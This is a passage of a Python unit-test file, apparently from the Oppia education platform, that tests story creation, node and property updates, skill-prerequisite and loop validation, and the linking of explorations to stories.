self.assertEqual(story_summary.id, self.STORY_ID)
self.assertEqual(story_summary.title, 'Title')
self.assertEqual(story_summary.description, 'Description')
self.assertEqual(story_summary.node_titles, ['Title 1'])
self.assertEqual(story_summary.thumbnail_bg_color, None)
self.assertEqual(story_summary.thumbnail_filename, None)
def test_get_new_story_id(self):
new_story_id = story_services.get_new_story_id()
self.assertEqual(len(new_story_id), 12)
self.assertEqual(story_models.StoryModel.get_by_id(new_story_id), None)
def test_commit_log_entry(self):
story_commit_log_entry = (
story_models.StoryCommitLogEntryModel.get_commit(self.STORY_ID, 1)
)
self.assertEqual(story_commit_log_entry.commit_type, 'create')
self.assertEqual(story_commit_log_entry.story_id, self.STORY_ID)
self.assertEqual(story_commit_log_entry.user_id, self.USER_ID)
def test_update_story_properties(self):
changelist = [
story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_PROPERTY,
'property_name': story_domain.STORY_PROPERTY_TITLE,
'old_value': 'Title',
'new_value': 'New Title'
}),
story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_PROPERTY,
'property_name': story_domain.STORY_PROPERTY_DESCRIPTION,
'old_value': 'Description',
'new_value': 'New Description'
}),
story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_PROPERTY,
'property_name': story_domain.STORY_PROPERTY_THUMBNAIL_FILENAME,
'old_value': None,
'new_value': 'image.svg'
}),
story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_PROPERTY,
'property_name': (
story_domain.STORY_PROPERTY_THUMBNAIL_BG_COLOR),
'old_value': None,
'new_value': constants.ALLOWED_THUMBNAIL_BG_COLORS['story'][0]
}),
story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_PROPERTY,
'property_name': (
story_domain.STORY_PROPERTY_META_TAG_CONTENT),
'old_value': None,
'new_value': 'new story meta tag content'
})
]
# Save a dummy image on filesystem, to be used as thumbnail.
with python_utils.open_file(
os.path.join(feconf.TESTS_DATA_DIR, 'test_svg.svg'),
'rb', encoding=None) as f:
raw_image = f.read()
fs = fs_domain.AbstractFileSystem(
fs_domain.GcsFileSystem(
feconf.ENTITY_TYPE_STORY, self.STORY_ID))
fs.commit(
'%s/image.svg' % (constants.ASSET_TYPE_THUMBNAIL), raw_image,
mimetype='image/svg+xml')
story_services.update_story(
self.USER_ID, self.STORY_ID, changelist,
'Updated Title and Description.')
story = story_fetchers.get_story_by_id(self.STORY_ID)
self.assertEqual(story.title, 'New Title')
self.assertEqual(story.description, 'New Description')
self.assertEqual(story.thumbnail_filename, 'image.svg')
self.assertEqual(story.thumbnail_size_in_bytes, len(raw_image))
self.assertEqual(
story.thumbnail_bg_color,
constants.ALLOWED_THUMBNAIL_BG_COLORS['story'][0])
self.assertEqual(story.version, 3)
self.assertEqual(story.meta_tag_content, 'new story meta tag content')
story_summary = story_fetchers.get_story_summary_by_id(self.STORY_ID)
self.assertEqual(story_summary.title, 'New Title')
self.assertEqual(story_summary.node_titles, ['Title 1'])
self.assertEqual(
story_summary.thumbnail_bg_color,
constants.ALLOWED_THUMBNAIL_BG_COLORS['story'][0])
self.assertEqual(story_summary.thumbnail_filename, 'image.svg')
def test_update_story_node_properties(self):
changelist = [
story_domain.StoryChange({
'cmd': story_domain.CMD_ADD_STORY_NODE,
'node_id': self.NODE_ID_2,
'title': 'Title 2'
}),
story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_DESCRIPTION),
'node_id': self.NODE_ID_2,
'old_value': '',
'new_value': 'Description 2'
}),
story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_DESTINATION_NODE_IDS),
'node_id': self.NODE_ID_2,
'old_value': [],
'new_value': [self.NODE_ID_1]
}),
story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_OUTLINE_STATUS,
'node_id': self.NODE_ID_2,
'old_value': False,
'new_value': True
}),
story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_CONTENTS_PROPERTY,
'property_name': (
story_domain.INITIAL_NODE_ID),
'old_value': self.NODE_ID_1,
'new_value': self.NODE_ID_2
}),
story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'node_id': self.NODE_ID_2,
'property_name': (
story_domain.STORY_NODE_PROPERTY_THUMBNAIL_FILENAME),
'old_value': None,
'new_value': 'image.svg'
}),
story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'node_id': self.NODE_ID_2,
'property_name': (
story_domain.STORY_NODE_PROPERTY_THUMBNAIL_BG_COLOR),
'old_value': None,
'new_value': constants.ALLOWED_THUMBNAIL_BG_COLORS[
'chapter'][0]
})
]
# Save a dummy image on filesystem, to be used as thumbnail.
with python_utils.open_file(
os.path.join(feconf.TESTS_DATA_DIR, 'test_svg.svg'),
'rb', encoding=None) as f:
raw_image = f.read()
fs = fs_domain.AbstractFileSystem(
fs_domain.GcsFileSystem(
feconf.ENTITY_TYPE_STORY, self.STORY_ID))
fs.commit(
'%s/image.svg' % (constants.ASSET_TYPE_THUMBNAIL), raw_image,
mimetype='image/svg+xml')
story_services.update_story(
self.USER_ID, self.STORY_ID, changelist, 'Added story node.')
story = story_fetchers.get_story_by_id(self.STORY_ID)
self.assertEqual(
story.story_contents.nodes[1].thumbnail_filename, 'image.svg')
self.assertEqual(
story.story_contents.nodes[1].thumbnail_size_in_bytes,
len(raw_image))
self.assertEqual(
story.story_contents.nodes[1].thumbnail_bg_color,
constants.ALLOWED_THUMBNAIL_BG_COLORS['chapter'][0])
self.assertEqual(
story.story_contents.nodes[1].destination_node_ids,
[self.NODE_ID_1])
self.assertEqual(
story.story_contents.nodes[1].outline_is_finalized, True)
self.assertEqual(story.story_contents.nodes[1].title, 'Title 2')
self.assertEqual(
story.story_contents.nodes[1].description, 'Description 2')
self.assertEqual(story.story_contents.initial_node_id, self.NODE_ID_2)
self.assertEqual(story.story_contents.next_node_id, 'node_3')
self.assertEqual(story.version, 3)
story_summary = story_fetchers.get_story_summary_by_id(self.STORY_ID)
self.assertEqual(story_summary.node_titles, ['Title 1', 'Title 2'])
changelist = [
story_domain.StoryChange({
'cmd': story_domain.CMD_DELETE_STORY_NODE,
'node_id': self.NODE_ID_1
}),
story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_OUTLINE_STATUS,
'node_id': self.NODE_ID_2,
'old_value': True,
'new_value': False
}),
story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_TITLE),
'node_id': self.NODE_ID_2,
'old_value': 'Title 2',
'new_value': 'Modified title 2'
}),
story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_DESCRIPTION),
'node_id': self.NODE_ID_2,
'old_value': 'Description 2',
'new_value': 'Modified description 2'
}),
]
story_services.update_story(
self.USER_ID, self.STORY_ID, changelist,
'Removed a story node.')
story_summary = story_fetchers.get_story_summary_by_id(self.STORY_ID)
story = story_fetchers.get_story_by_id(self.STORY_ID)
self.assertEqual(story_summary.node_titles, ['Modified title 2'])
self.assertEqual(
story.story_contents.nodes[0].title, 'Modified title 2')
self.assertEqual(
story.story_contents.nodes[0].description, 'Modified description 2')
self.assertEqual(story.story_contents.nodes[0].destination_node_ids, [])
self.assertEqual(
story.story_contents.nodes[0].outline_is_finalized, False)
def test_prerequisite_skills_validation(self):
self.story.story_contents.next_node_id = 'node_4'
node_1 = {
'id': 'node_1',
'thumbnail_filename': 'image.svg',
'thumbnail_bg_color': constants.ALLOWED_THUMBNAIL_BG_COLORS[
'chapter'][0],
'thumbnail_size_in_bytes': 21131,
'title': 'Title 1',
'description': 'Description 1',
'destination_node_ids': ['node_2', 'node_3'],
'acquired_skill_ids': ['skill_2'],
'prerequisite_skill_ids': ['skill_1'],
'outline': '',
'outline_is_finalized': False,
'exploration_id': None
}
node_2 = {
'id': 'node_2',
'thumbnail_filename': 'image.svg',
'thumbnail_bg_color': constants.ALLOWED_THUMBNAIL_BG_COLORS[
'chapter'][0],
'thumbnail_size_in_bytes': 21131,
'title': 'Title 2',
'description': 'Description 2',
'destination_node_ids': [],
'acquired_skill_ids': ['skill_3'],
'prerequisite_skill_ids': ['skill_2'],
'outline': '',
'outline_is_finalized': False,
'exploration_id': None
}
node_3 = {
'id': 'node_3',
'thumbnail_filename': 'image.svg',
'thumbnail_bg_color': constants.ALLOWED_THUMBNAIL_BG_COLORS[
'chapter'][0],
'thumbnail_size_in_bytes': 21131,
'title': 'Title 3',
'description': 'Description 3',
'destination_node_ids': [],
'acquired_skill_ids': [],
'prerequisite_skill_ids': ['skill_4'],
'outline': '',
'outline_is_finalized': False,
'exploration_id': None
}
self.story.story_contents.initial_node_id = 'node_1'
self.story.story_contents.nodes = [
story_domain.StoryNode.from_dict(node_1),
story_domain.StoryNode.from_dict(node_2),
story_domain.StoryNode.from_dict(node_3)
]
expected_error_string = (
'The skills with ids skill_4 were specified as prerequisites for '
'Chapter Title 3, but were not taught in any chapter before it')
with self.assertRaisesRegexp(
utils.ValidationError, expected_error_string):
story_services.validate_prerequisite_skills_in_story_contents(
self.story.corresponding_topic_id, self.story.story_contents)
def test_story_with_loop(self):
self.story.story_contents.next_node_id = 'node_4'
node_1 = {
'id': 'node_1',
'thumbnail_filename': 'image.svg',
'thumbnail_bg_color': constants.ALLOWED_THUMBNAIL_BG_COLORS[
'chapter'][0],
'thumbnail_size_in_bytes': 21131,
'title': 'Title 1',
'description': 'Description 1',
'destination_node_ids': ['node_2'],
'acquired_skill_ids': ['skill_2'],
'prerequisite_skill_ids': ['skill_1'],
'outline': '',
'outline_is_finalized': False,
'exploration_id': None
}
node_2 = {
'id': 'node_2',
'thumbnail_filename': 'image.svg',
'thumbnail_bg_color': constants.ALLOWED_THUMBNAIL_BG_COLORS[
'chapter'][0],
'thumbnail_size_in_bytes': 21131,
'title': 'Title 2',
'description': 'Description 2',
'destination_node_ids': ['node_3'],
'acquired_skill_ids': ['skill_3'],
'prerequisite_skill_ids': ['skill_2'],
'outline': '',
'outline_is_finalized': False,
'exploration_id': None
}
node_3 = {
'id': 'node_3',
'thumbnail_filename': 'image.svg',
'thumbnail_bg_color': constants.ALLOWED_THUMBNAIL_BG_COLORS[
'chapter'][0],
'thumbnail_size_in_bytes': 21131,
'title': 'Title 3',
'description': 'Description 3',
'destination_node_ids': ['node_2'],
'acquired_skill_ids': ['skill_4'],
'prerequisite_skill_ids': ['skill_3'],
'outline': '',
'outline_is_finalized': False,
'exploration_id': None
}
self.story.story_contents.nodes = [
story_domain.StoryNode.from_dict(node_1),
story_domain.StoryNode.from_dict(node_2),
story_domain.StoryNode.from_dict(node_3)
]
expected_error_string = 'Loops are not allowed in stories.'
with self.assertRaisesRegexp(
utils.ValidationError, expected_error_string):
story_services.validate_prerequisite_skills_in_story_contents(
self.story.corresponding_topic_id, self.story.story_contents)
def test_does_story_exist_with_url_fragment(self):
story_id_1 = story_services.get_new_story_id()
story_id_2 = story_services.get_new_story_id()
self.save_new_story(
story_id_1, self.USER_ID, self.TOPIC_ID, url_fragment='story-one')
self.save_new_story(
story_id_2, self.USER_ID, self.TOPIC_ID, url_fragment='story-two')
topic_services.add_canonical_story(
self.USER_ID, self.TOPIC_ID, story_id_1)
topic_services.add_canonical_story(
self.USER_ID, self.TOPIC_ID, story_id_2)
self.assertTrue(
story_services.does_story_exist_with_url_fragment('story-one'))
self.assertTrue(
story_services.does_story_exist_with_url_fragment('story-two'))
self.assertFalse(
story_services.does_story_exist_with_url_fragment('story-three'))
def test_update_story_with_invalid_corresponding_topic_id_value(self):
topic_id = topic_fetchers.get_new_topic_id()
story_id = story_services.get_new_story_id()
self.save_new_story(story_id, self.USER_ID, topic_id)
changelist = [
story_domain.StoryChange({
'cmd': story_domain.CMD_ADD_STORY_NODE,
'node_id': self.NODE_ID_1,
'title': 'Title 1'
})
]
with self.assertRaisesRegexp(
Exception, (
'Expected story to only belong to a valid topic, but '
'found no topic with ID: %s' % topic_id)):
story_services.update_story(
self.USER_ID, story_id, changelist, 'Added node.')
def test_update_story_which_not_corresponding_topic_id(self):
topic_id = topic_fetchers.get_new_topic_id()
story_id = story_services.get_new_story_id()
self.save_new_topic(
topic_id, self.USER_ID, name='A New Topic',
abbreviated_name='new-topic', url_fragment='new-topic',
description='A new topic description.',
canonical_story_ids=[], additional_story_ids=[],
uncategorized_skill_ids=[], subtopics=[], next_subtopic_id=0)
self.save_new_story(story_id, self.USER_ID, topic_id)
changelist = [
story_domain.StoryChange({
'cmd': story_domain.CMD_ADD_STORY_NODE,
'node_id': self.NODE_ID_1,
'title': 'Title 1'
})
]
with self.assertRaisesRegexp(
Exception, (
'Expected story to belong to the topic %s, but it is '
'neither a part of the canonical stories or the '
'additional stories of the topic.' % topic_id)):
story_services.update_story(
self.USER_ID, story_id, changelist, 'Added node.')
def test_delete_story(self):
story_services.delete_story(self.USER_ID, self.STORY_ID)
self.assertEqual(story_fetchers.get_story_by_id(
self.STORY_ID, strict=False), None)
self.assertEqual(
story_fetchers.get_story_summary_by_id(
self.STORY_ID, strict=False), None)
def test_cannot_get_story_from_model_with_invalid_schema_version(self):
story_model = story_models.StoryModel.get(self.STORY_ID)
story_model.story_contents_schema_version = 0
story_model.commit(self.USER_ID, 'change schema version', [])
with self.assertRaisesRegexp(
Exception,
'Sorry, we can only process v1-v%d story schemas at '
'present.' % feconf.CURRENT_STORY_CONTENTS_SCHEMA_VERSION):
story_fetchers.get_story_from_model(story_model)
def test_get_story_summaries_by_ids(self):
story_summaries = story_fetchers.get_story_summaries_by_ids(
[self.STORY_ID])
self.assertEqual(len(story_summaries), 1)
self.assertEqual(story_summaries[0].id, self.STORY_ID)
self.assertEqual(story_summaries[0].title, 'Title')
self.assertEqual(story_summaries[0].description, 'Description')
self.assertEqual(story_summaries[0].language_code, 'en')
self.assertEqual(story_summaries[0].node_titles, ['Title 1'])
self.assertEqual(story_summaries[0].thumbnail_filename, None)
self.assertEqual(story_summaries[0].thumbnail_bg_color, None)
self.assertEqual(story_summaries[0].version, 2)
def test_cannot_update_story_with_non_story_change_changelist(self):
observed_log_messages = []
def _mock_logging_function(msg, *args):
"""Mocks logging.error()."""
observed_log_messages.append(msg % args)
logging_swap = self.swap(logging, 'error', _mock_logging_function)
assert_raises_regexp_context_manager = self.assertRaisesRegexp(
Exception, 'Expected change to be of type StoryChange')
with logging_swap, assert_raises_regexp_context_manager:
story_services.update_story(
self.USER_ID, self.STORY_ID, [{}], 'Updated story node.')
self.assertEqual(
observed_log_messages,
[
'Exception Expected change to be of type StoryChange %s [{}]'
% self.STORY_ID
]
)
def test_update_story_node_outline(self):
story = story_fetchers.get_story_by_id(self.STORY_ID)
self.assertEqual(story.story_contents.nodes[0].outline, '')
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_OUTLINE),
'node_id': 'node_1',
'old_value': '',
'new_value': 'new_outline'
})]
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list, 'Updated story outline.')
story = story_fetchers.get_story_by_id(self.STORY_ID)
self.assertEqual(story.story_contents.nodes[0].outline, 'new_outline')
def test_cannot_update_story_node_outline_with_invalid_node_id(self):
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_OUTLINE),
'node_id': 'invalid_node',
'old_value': '',
'new_value': 'new_outline'
})]
with self.assertRaisesRegexp(
Exception,
'The node with id invalid_node is not part of this story'):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list,
'Updated story outline.')
def test_cannot_update_story_with_no_commit_message(self):
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_DESCRIPTION),
'node_id': self.NODE_ID_1,
'old_value': '',
'new_value': 'New description.'
})]
with self.assertRaisesRegexp(
Exception,
'Expected a commit message but received none.'):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list, None)
def test_update_story_acquired_skill_ids(self):
story = story_fetchers.get_story_by_id(self.STORY_ID)
self.assertEqual(story.story_contents.nodes[0].acquired_skill_ids, [])
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_ACQUIRED_SKILL_IDS),
'node_id': 'node_1',
'old_value': [],
'new_value': ['skill_id']
})]
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list,
'Updated story acquired_skill_ids.')
story = story_fetchers.get_story_by_id(self.STORY_ID)
self.assertEqual(
story.story_contents.nodes[0].acquired_skill_ids, ['skill_id'])
def test_exploration_context_model_is_modified_correctly(self):
changelist = [
story_domain.StoryChange({
'cmd': story_domain.CMD_ADD_STORY_NODE,
'node_id': self.NODE_ID_2,
'title': 'Title 2'
}),
story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_DESTINATION_NODE_IDS),
'node_id': self.NODE_ID_1,
'old_value': [],
'new_value': [self.NODE_ID_2]
})
]
story_services.update_story(
self.USER_ID, self.STORY_ID, changelist,
'Added node.')
self.save_new_valid_exploration(
'0', self.user_id_admin, title='Title 1',
category='Mathematics', language_code='en',
correctness_feedback_enabled=True)
self.save_new_valid_exploration(
'1', self.user_id_admin, title='Title 2',
category='Mathematics', language_code='en',
correctness_feedback_enabled=True)
self.save_new_valid_exploration(
'2', self.user_id_admin, title='Title 3',
category='Mathematics', language_code='en',
correctness_feedback_enabled=True)
self.publish_exploration(self.user_id_admin, '0')
self.publish_exploration(self.user_id_admin, '1')
self.publish_exploration(self.user_id_admin, '2')
self.assertIsNone(
exp_services.get_story_id_linked_to_exploration('0'))
self.assertIsNone(
exp_services.get_story_id_linked_to_exploration('1'))
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': self.NODE_ID_1,
'old_value': None,
'new_value': '0'
}), story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': self.NODE_ID_2,
'old_value': None,
'new_value': '1'
})]
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list, 'Updated story node.')
self.assertEqual(
exp_services.get_story_id_linked_to_exploration('0'), self.STORY_ID)
self.assertEqual(
exp_services.get_story_id_linked_to_exploration('1'), self.STORY_ID)
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': self.NODE_ID_2,
'old_value': '1',
'new_value': '2'
}), story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': self.NODE_ID_2,
'old_value': '2',
'new_value': '1'
}), story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': self.NODE_ID_1,
'old_value': '0',
'new_value': '2'
})]
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list, 'Updated story node.')
self.assertIsNone(
exp_services.get_story_id_linked_to_exploration('0'))
self.assertEqual(
exp_services.get_story_id_linked_to_exploration('1'), self.STORY_ID)
self.assertEqual(
exp_services.get_story_id_linked_to_exploration('2'), self.STORY_ID)
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': self.NODE_ID_1,
'old_value': '2',
'new_value': '0'
}), story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': self.NODE_ID_2,
'old_value': '1',
'new_value': '2'
}), story_domain.StoryChange({
'cmd': story_domain.CMD_DELETE_STORY_NODE,
'node_id': self.NODE_ID_2
}), story_domain.StoryChange({
'cmd': story_domain.CMD_ADD_STORY_NODE,
'node_id': 'node_3',
'title': 'Title 2'
}), story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_DESTINATION_NODE_IDS),
'node_id': self.NODE_ID_1,
'old_value': [],
'new_value': ['node_3']
}), story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': 'node_3',
'old_value': None,
'new_value': '1'
})]
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list, 'Updated story node.')
self.assertEqual(
exp_services.get_story_id_linked_to_exploration('0'), self.STORY_ID)
self.assertEqual(
exp_services.get_story_id_linked_to_exploration('1'), self.STORY_ID)
self.assertIsNone(
exp_services.get_story_id_linked_to_exploration('2'))
story_services.delete_story(self.USER_ID, self.STORY_ID)
self.assertIsNone(
exp_services.get_story_id_linked_to_exploration('0'))
self.assertIsNone(
exp_services.get_story_id_linked_to_exploration('1'))
self.assertIsNone(
exp_services.get_story_id_linked_to_exploration('2'))
self.save_new_story('story_id_2', self.USER_ID, self.TOPIC_ID)
topic_services.add_canonical_story(
self.USER_ID, self.TOPIC_ID, 'story_id_2')
# Creates node 1 -> node 2 -> node 3, links exp IDs 0, 1 and 2 with them
# respectively. Then, deletes 2, 3, adds node 4 (node 1 -> node 4),
# deletes it and adds node 5 (node 1 -> node 5).
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_ADD_STORY_NODE,
'node_id': 'node_1',
'title': 'Title 1'
}), story_domain.StoryChange({
'cmd': story_domain.CMD_ADD_STORY_NODE,
'node_id': 'node_2',
'title': 'Title 2'
}), story_domain.StoryChange({
'cmd': story_domain.CMD_ADD_STORY_NODE,
'node_id': 'node_3',
'title': 'Title 3'
}), story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_DESTINATION_NODE_IDS),
'node_id': self.NODE_ID_1,
'old_value': [],
'new_value': ['node_2']
}), story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_DESTINATION_NODE_IDS),
'node_id': self.NODE_ID_2,
'old_value': [],
'new_value': ['node_3']
}), story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': self.NODE_ID_1,
'old_value': None,
'new_value': '0'
}), story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': self.NODE_ID_2,
'old_value': None,
'new_value': '1'
}), story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': 'node_3',
'old_value': None,
'new_value': '2'
}), story_domain.StoryChange({
'cmd': story_domain.CMD_DELETE_STORY_NODE,
'node_id': self.NODE_ID_2
}), story_domain.StoryChange({
'cmd': story_domain.CMD_DELETE_STORY_NODE,
'node_id': 'node_3'
}), story_domain.StoryChange({
'cmd': story_domain.CMD_ADD_STORY_NODE,
'node_id': 'node_4',
'title': 'Title 4'
}), story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': 'node_4',
'old_value': None,
'new_value': '2'
}), story_domain.StoryChange({
'cmd': story_domain.CMD_DELETE_STORY_NODE,
'node_id': 'node_4'
}), story_domain.StoryChange({
'cmd': story_domain.CMD_ADD_STORY_NODE,
'node_id': 'node_5',
'title': 'Title 5'
}), story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_DESTINATION_NODE_IDS),
'node_id': 'node_1',
'old_value': ['node_2'],
'new_value': ['node_5']
}), story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': 'node_5',
'old_value': None,
'new_value': '1'
})]
story_services.update_story(
self.USER_ID, 'story_id_2', change_list, 'Updated story node.')
self.assertEqual(
exp_services.get_story_id_linked_to_exploration('0'), 'story_id_2')
self.assertEqual(
exp_services.get_story_id_linked_to_exploration('1'), 'story_id_2')
self.assertIsNone(
exp_services.get_story_id_linked_to_exploration('2'))
def test_exploration_story_link_collision(self):
self.save_new_story('story_id_2', self.USER_ID, self.TOPIC_ID)
topic_services.add_canonical_story(
self.USER_ID, self.TOPIC_ID, 'story_id_2')
self.save_new_valid_exploration(
'0', self.user_id_admin, title='Title 1',
category='Mathematics', language_code='en',
correctness_feedback_enabled=True)
self.publish_exploration(self.user_id_admin, '0')
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': self.NODE_ID_1,
'old_value': None,
'new_value': '0'
})]
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list, 'Updated story node.')
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_ADD_STORY_NODE,
'node_id': self.NODE_ID_1,
'title': 'Title 1'
}), story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': self.NODE_ID_1,
'old_value': None,
'new_value': '0'
})]
with self.assertRaisesRegexp(
Exception,
'The exploration with ID 0 is already linked to story '
'with ID %s' % self.STORY_ID):
story_services.update_story(
self.USER_ID, 'story_id_2', change_list,
'Added chapter.')
def test_cannot_update_story_acquired_skill_ids_with_invalid_node_id(self):
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_ACQUIRED_SKILL_IDS),
'node_id': 'invalid_node',
'old_value': [],
'new_value': ['skill_id']
})]
with self.assertRaisesRegexp(
Exception,
'The node with id invalid_node is not part of this story'):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list,
'Updated story acquired_skill_ids.')
def test_update_story_notes(self):
story = story_fetchers.get_story_by_id(self.STORY_ID)
self.assertEqual(story.notes, 'Notes')
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_PROPERTY,
'property_name': story_domain.STORY_PROPERTY_NOTES,
'old_value': 'Notes',
'new_value': 'New notes'
})]
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list, 'Updated story notes.')
story = story_fetchers.get_story_by_id(self.STORY_ID)
self.assertEqual(story.notes, 'New notes')
def test_update_story_language_code(self):
story = story_fetchers.get_story_by_id(self.STORY_ID)
self.assertEqual(story.language_code, 'en')
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_PROPERTY,
'property_name': story_domain.STORY_PROPERTY_LANGUAGE_CODE,
'old_value': 'en',
'new_value': 'bn'
})]
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list,
'Updated story language_code.')
story = story_fetchers.get_story_by_id(self.STORY_ID)
self.assertEqual(story.language_code, 'bn')
def test_update_story_url_fragment(self):
story = story_fetchers.get_story_by_id(self.STORY_ID)
self.assertEqual(story.url_fragment, 'title')
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_PROPERTY,
'property_name': story_domain.STORY_PROPERTY_URL_FRAGMENT,
'old_value': 'title',
'new_value': 'updated-title'
})]
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list,
'Updated story url_fragment.')
story = story_fetchers.get_story_by_id(self.STORY_ID)
self.assertEqual(story.url_fragment, 'updated-title')
def test_cannot_update_story_if_url_fragment_already_exists(self):
topic_id = topic_fetchers.get_new_topic_id()
story_id = story_services.get_new_story_id()
self.save_new_story(
story_id, self.USER_ID, topic_id,
title='original', url_fragment='original')
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_PROPERTY,
'property_name': story_domain.STORY_PROPERTY_URL_FRAGMENT,
'old_value': 'title',
'new_value': 'original'
})]
exception_message = 'Story Url Fragment is not unique across the site.'
with self.assertRaisesRegexp(Exception, exception_message):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list,
'Updated story url_fragment.')
def test_cannot_update_story_with_no_change_list(self):
with self.assertRaisesRegexp(
Exception,
'Unexpected error: received an invalid change list when trying to '
'save story'):
story_services.update_story(
self.USER_ID, self.STORY_ID, [], 'Commit message')
def test_cannot_update_story_with_invalid_exploration_id(self):
topic_services.publish_story(
